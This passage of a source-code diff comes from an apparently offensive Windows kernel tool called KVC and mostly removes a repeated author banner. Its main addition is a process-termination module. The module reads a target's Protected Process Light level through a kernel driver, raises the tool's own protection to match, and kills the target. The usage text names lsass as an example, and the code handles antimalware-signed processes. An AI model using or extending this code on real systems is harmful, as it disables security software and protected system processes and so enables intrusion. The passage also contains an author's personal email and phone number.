-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // KvcDrv.cpp
 #include "kvcDrv.h"
 #include "common.h"
@@ -166,4 +141,4 @@ bool kvc::Write(ULONG_PTR address, DWORD valueSize, DWORD value) noexcept {
     DWORD bytesReturned = 0;
     return DeviceIoControl(m_deviceHandle.get(), RTC_IOCTL_MEMORY_WRITE, 
                           &memoryWrite, sizeof(memoryWrite), &memoryWrite, sizeof(memoryWrite), &bytesReturned, nullptr);
-}
+}

kvc/KvcDrv.h

@@ -54,7 +54,7 @@ public:
     bool Write16(ULONG_PTR address, WORD value) noexcept;
     bool Write32(ULONG_PTR address, DWORD value) noexcept;
     bool Write64(ULONG_PTR address, DWORD64 value) noexcept;
-
+	
 private:
     // Smart handle wrapper for automatic cleanup
     struct HandleDeleter

kvc/OffsetFinder.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // OffsetFinder.cpp
 #include "OffsetFinder.h"
 #include "Utils.h"

kvc/ProcessManager.cpp

@@ -0,0 +1,275 @@
+// ProcessManager.cpp
+#include "ProcessManager.h"
+#include "Controller.h"
+#include "Utils.h"
+#include <cwctype>
+#include <sstream>
+#include <iostream>
+#include <iomanip>
+#include <TlHelp32.h>
+#include <algorithm>
+#include <cctype>
+
+extern volatile bool g_interrupted;
+
+// Helper function to check if string contains only digits (PID)
+bool ProcessManager::IsNumericPid(std::wstring_view input) noexcept {
+    if (input.empty()) return false;
+    return std::all_of(input.begin(), input.end(), [](wchar_t c) { return iswdigit(c); });
+}
+
+// Find process PIDs by name using Windows toolhelp API
+std::vector<DWORD> ProcessManager::FindProcessIdsByName(const std::wstring& processName) noexcept {
+    std::vector<DWORD> pids;
+    
+    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+    if (hSnapshot == INVALID_HANDLE_VALUE) {
+        return pids;
+    }
+
+    PROCESSENTRY32W pe;
+    pe.dwSize = sizeof(PROCESSENTRY32W);
+    
+    if (Process32FirstW(hSnapshot, &pe)) {
+        do {
+            std::wstring currentName = pe.szExeFile;
+            
+            // Remove .exe extension for comparison if present
+            if (currentName.size() > 4 && currentName.substr(currentName.size() - 4) == L".exe") {
+                currentName = currentName.substr(0, currentName.size() - 4);
+            }
+            
+            // Case-insensitive partial match
+            std::wstring lowerCurrent = currentName;
+            std::wstring lowerTarget = processName;
+            std::transform(lowerCurrent.begin(), lowerCurrent.end(), lowerCurrent.begin(), ::towlower);
+            std::transform(lowerTarget.begin(), lowerTarget.end(), lowerTarget.begin(), ::towlower);
+            
+            if (lowerCurrent.find(lowerTarget) != std::wstring::npos) {
+                pids.push_back(pe.th32ProcessID);
+            }
+            
+        } while (Process32NextW(hSnapshot, &pe));
+    }
+    
+    CloseHandle(hSnapshot);
+    return pids;
+}
+
+// Terminate process with automatic protection elevation
+bool ProcessManager::TerminateProcessWithProtection(DWORD processId, Controller* controller) noexcept {
+    if (!controller) {
+        ERROR(L"Controller not available for protection elevation");
+        return false;
+    }
+
+    if (g_interrupted) {
+        INFO(L"Operation cancelled by user before termination");
+        return false;
+    }
+
+    std::wstring processName = Utils::GetProcessName(processId);
+    INFO(L"Attempting to terminate process: %s (PID %d)", processName.c_str(), processId);
+
+    // Get target process protection level for self-elevation
+    auto kernelAddr = controller->GetProcessKernelAddress(processId);
+    bool needsSelfProtection = false;
+    std::wstring levelStr, signerStr;
+
+    if (kernelAddr) {
+        auto targetProtection = controller->GetProcessProtection(kernelAddr.value());
+        if (targetProtection && targetProtection.value() > 0) {
+            needsSelfProtection = true;
+            
+            UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value());
+            UCHAR targetSigner = Utils::GetSignerType(targetProtection.value());
+
+            levelStr = (targetLevel == static_cast<UCHAR>(PS_PROTECTED_TYPE::Protected)) ? L"PP" : L"PPL";
+            
+            switch (static_cast<PS_PROTECTED_SIGNER>(targetSigner)) {
+                case PS_PROTECTED_SIGNER::Lsa: signerStr = L"Lsa"; break;
+                case PS_PROTECTED_SIGNER::WinTcb: signerStr = L"WinTcb"; break;
+                case PS_PROTECTED_SIGNER::WinSystem: signerStr = L"WinSystem"; break;
+                case PS_PROTECTED_SIGNER::Windows: signerStr = L"Windows"; break;
+                case PS_PROTECTED_SIGNER::Antimalware: signerStr = L"Antimalware"; break;
+                case PS_PROTECTED_SIGNER::Authenticode: signerStr = L"Authenticode"; break;
+                case PS_PROTECTED_SIGNER::CodeGen: signerStr = L"CodeGen"; break;
+                case PS_PROTECTED_SIGNER::App: signerStr = L"App"; break;
+                default: 
+                    INFO(L"Unknown signer type - attempting termination without self-protection");
+                    needsSelfProtection = false;
+                    break;
+            }
+
+            if (needsSelfProtection) {
+                INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str());
+                
+                if (!controller->SelfProtect(levelStr, signerStr)) {
+                    INFO(L"Self-protection elevation failed: %s-%s (attempting termination anyway)", 
+                         levelStr.c_str(), signerStr.c_str());
+                    needsSelfProtection = false;
+                } else {
+                    SUCCESS(L"Self-protection elevated to %s-%s", levelStr.c_str(), signerStr.c_str());
+                }
+            }
+        } else {
+            INFO(L"Target process is not protected, proceeding with standard termination");
+        }
+    } else {
+        INFO(L"Could not get kernel address for target process, proceeding without self-protection");
+    }
+
+    if (g_interrupted) {
+        INFO(L"Operation cancelled by user during protection setup");
+        if (needsSelfProtection) {
+            controller->SelfProtect(L"none", L"none");
+        }
+        return false;
+    }
+
+    // Attempt process termination
+    HANDLE processHandle = OpenProcess(PROCESS_TERMINATE, FALSE, processId);
+    bool success = false;
+    
+    if (processHandle) {
+        BOOL result = TerminateProcess(processHandle, 0);
+        CloseHandle(processHandle);
+        success = (result != FALSE);
+    } else {
+        DWORD error = GetLastError();
+        ERROR(L"Failed to open process for termination (error: %d)", error);
+    }
+
+    // Cleanup self-protection
+    if (needsSelfProtection) {
+        if (!controller->SelfProtect(L"none", L"none")) {
+            ERROR(L"Failed to cleanup self-protection after termination");
+        } else {
+            INFO(L"Self-protection cleaned up successfully");
+        }
+    }
+
+    return success;
+}
+
+// Main command handler for process termination operations with protection elevation
+void ProcessManager::HandleKillCommand(int argc, wchar_t* argv[], Controller* controller) noexcept {
+    if (argc < 3) {
+        PrintKillUsage();
+        return;
+    }
+
+    if (!controller) {
+        ERROR(L"Controller not available - cannot perform protected process termination");
+        return;
+    }
+
+    INFO(L"Starting process termination with automatic protection elevation...");
+
+    std::vector<DWORD> processIds;
+    if (!ParseProcessIds(argv[2], processIds)) {
+        ERROR(L"Failed to parse process ID/name list");
+        return;
+    }
+
+    if (processIds.empty()) {
+        ERROR(L"No valid process IDs or names provided");
+        return;
+    }
+
+    if (g_interrupted) {
+        INFO(L"Operation cancelled by user before processing");
+        return;
+    }
+
+    // Execute termination for each target process with protection elevation
+        int successCount = 0;
+		for (DWORD pid : processIds) {
+			if (g_interrupted) {
+				INFO(L"Operation cancelled by user during batch termination");
+				break;
+			}
+
+			if (controller->KillProcess(pid)) {
+				SUCCESS(L"Terminated PID: %u", pid);
+				successCount++;
+			} else {
+				ERROR(L"Failed to terminate PID: %u", pid);
+			}
+    }
+    
+    INFO(L"Kill operation completed: %d/%zu processes terminated", 
+         successCount, processIds.size());
+}
+
+// Parse comma-separated process ID/name list with input validation
+bool ProcessManager::ParseProcessIds(std::wstring_view pidList, std::vector<DWORD>& pids) noexcept {
+    std::wstring pidStr(pidList);
+    size_t pos = 0;
+    size_t start = 0;
+    
+    while (pos != std::wstring::npos) {
+        pos = pidStr.find(L',', start);
+        std::wstring token;
+        
+        if (pos != std::wstring::npos) {
+            token = pidStr.substr(start, pos - start);
+            start = pos + 1;
+        } else {
+            token = pidStr.substr(start);
+        }
+        
+        // Trim leading and trailing whitespace
+        size_t first = token.find_first_not_of(L" \t");
+        if (first == std::wstring::npos) continue;
+        
+        size_t last = token.find_last_not_of(L" \t");
+        token = token.substr(first, (last - first + 1));
+        
+        if (token.empty()) continue;
+        
+        // Check if token is numeric (PID) or text (process name)
+        if (IsNumericPid(token)) {
+            try {
+                DWORD pid = std::wcstoul(token.c_str(), nullptr, 10);
+                if (pid == 0) {
+                    ERROR(L"Invalid PID: %s (PID cannot be 0)", token.c_str());
+                    continue;
+                }
+                pids.push_back(pid);
+            }
+            catch (...) {
+                ERROR(L"Invalid PID format: %s", token.c_str());
+                continue;
+            }
+        }
+        else {
+            // Process name - find matching PIDs using Toolhelp32 (will be handled by Controller later)
+            auto foundPids = FindProcessIdsByName(token);
+            if (foundPids.empty()) {
+                ERROR(L"No process found matching: %s", token.c_str());
+                continue;
+            }
+
+            INFO(L"Found %zu processes matching '%s'", foundPids.size(), token.c_str());
+            for (DWORD pid : foundPids) {
+                pids.push_back(pid);
+            }
+        }
+    }
+    
+    return !pids.empty();
+}
+
+// Display command usage and examples
+void ProcessManager::PrintKillUsage() noexcept {
+    std::wcout << L"Usage: kvc kill <pid1|name1>[,pid2|name2,pid3|name3,...]\n";
+    std::wcout << L"  Examples:\n";
+    std::wcout << L"    kvc kill 1234\n";
+    std::wcout << L"    kvc kill notepad\n";
+    std::wcout << L"    kvc kill total\n";
+    std::wcout << L"    kvc kill lsass          # Protected process (auto-elevation)\n";
+    std::wcout << L"    kvc kill 1234,notepad,calc\n";
+    std::wcout << L"    kvc kill \"1234, notepad, 5678\"\n";
+    std::wcout << L"  Note: Automatically elevates protection level to match protected targets\n\n";
+}

kvc/ProcessManager.h

@@ -0,0 +1,28 @@
+// ProcessManager.h
+#pragma once
+
+#include "common.h"
+#include <vector>
+#include <string>
+
+// Forward declaration to avoid circular includes
+class Controller;
+
+// Process management operations with self-protection capabilities
+class ProcessManager
+{
+public:
+    ProcessManager() = delete;
+    ~ProcessManager() = delete;
+
+    // Command line interface for process termination with Controller integration
+    static void HandleKillCommand(int argc, wchar_t* argv[], Controller* controller) noexcept;
+
+private:
+    // Command parsing and validation helpers
+    static bool ParseProcessIds(std::wstring_view pidList, std::vector<DWORD>& pids) noexcept;
+    static void PrintKillUsage() noexcept;
+    static bool TerminateProcessWithProtection(DWORD processId, Controller* controller) noexcept;
+    static bool IsNumericPid(std::wstring_view input) noexcept;
+    static std::vector<DWORD> FindProcessIdsByName(const std::wstring& processName) noexcept;
+};

kvc/ReportExporter.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 #include "ReportExporter.h"
 #include "Controller.h"
 #include <filesystem>

kvc/SelfLoader.cpp

@@ -1,29 +1,4 @@
-/*******************************************************************************
+// SelfLoader.cpp
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
-// SelfLoader.cpp
 #include <windows.h>
 #include <algorithm>
 #include <cstring>

kvc/ServiceManager.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 #include "ServiceManager.h"
 #include "Controller.h"
 #include "KeyboardHook.h"

kvc/TrustedInstallerIntegrator.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 #include "TrustedInstallerIntegrator.h"
 #include "common.h"
 #include <tchar.h>

kvc/Utils.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // Utils.cpp - Fixed compilation issues with NtQuerySystemInformation
 #include "Utils.h"
 #include "common.h"

kvc/Utils.h

@@ -54,7 +54,7 @@ namespace Utils
         return sectionSignatureLevel & 0x0F;
     }
     
-    // String conversion functions with static caching
+    // String conversion functions with static caching for performance
     const wchar_t* GetProtectionLevelAsString(UCHAR protectionLevel) noexcept;
     const wchar_t* GetSignerTypeAsString(UCHAR signerType) noexcept;
     const wchar_t* GetSignatureLevelAsString(UCHAR signatureLevel) noexcept;
@@ -75,8 +75,8 @@ namespace Utils
     };
     
     ProcessDumpability CanDumpProcess(DWORD pid, const std::wstring& processName) noexcept;
-	
+    
-	// Hex string processing utilities for kernel tools
+    // Hex string processing utilities for kernel tools
     bool HexStringToBytes(const std::wstring& hexString, std::vector<BYTE>& bytes) noexcept;
     bool IsValidHexString(const std::wstring& hexString) noexcept;
 

kvc/common.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // common.cpp - Core system utilities and dynamic API management
 // Implements service management, system path resolution, and Windows API abstraction
 

kvc/kvc_crypt.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // kvc_crypt.cpp
 #include <Windows.h>
 #include <ShlObj.h>

kvc/kvc_crypt.vcxproj

@@ -82,7 +82,7 @@
     <!-- Fixed: Added resource file for Microsoft Corporation version info -->
     <ResourceCompile Include="kvc_crypt.rc" />
   </ItemGroup>
-  <!-- DODAJ TARGET DO CZYSZCZENIA ZASOBÓW -->
+  <!-- ADD TARGET FOR RESOURCE CLEANING -->
   <Target Name="RemoveVCRuntimeResources" AfterTargets="Link">
     <Exec Command="if exist &quot;@(FinalOutputPath)&quot; echo Building minimal DLL..." />
   </Target>

kvc/syscalls.cpp

@@ -1,28 +1,3 @@
-/*******************************************************************************
-  _  ____     ______ 
- | |/ /\ \   / / ___|
- | ' /  \ \ / / |    
- | . \   \ V /| |___ 
- |_|\_\   \_/  \____|
-
-The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, 
-offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived 
-as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation 
-of kernel-level primitives** for legitimate security research and penetration testing.
-
-KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows 
-security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware 
-Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures 
-that define these protections.
-
-  -----------------------------------------------------------------------------
-  Author : Marek Wesołowski
-  Email  : marek@wesolowski.eu.org
-  Phone  : +48 607 440 283 (Tel/WhatsApp)
-  Date   : 04-09-2025
-
-*******************************************************************************/
-
 // syscalls.cpp
 #include "syscalls.h"
 #include <vector>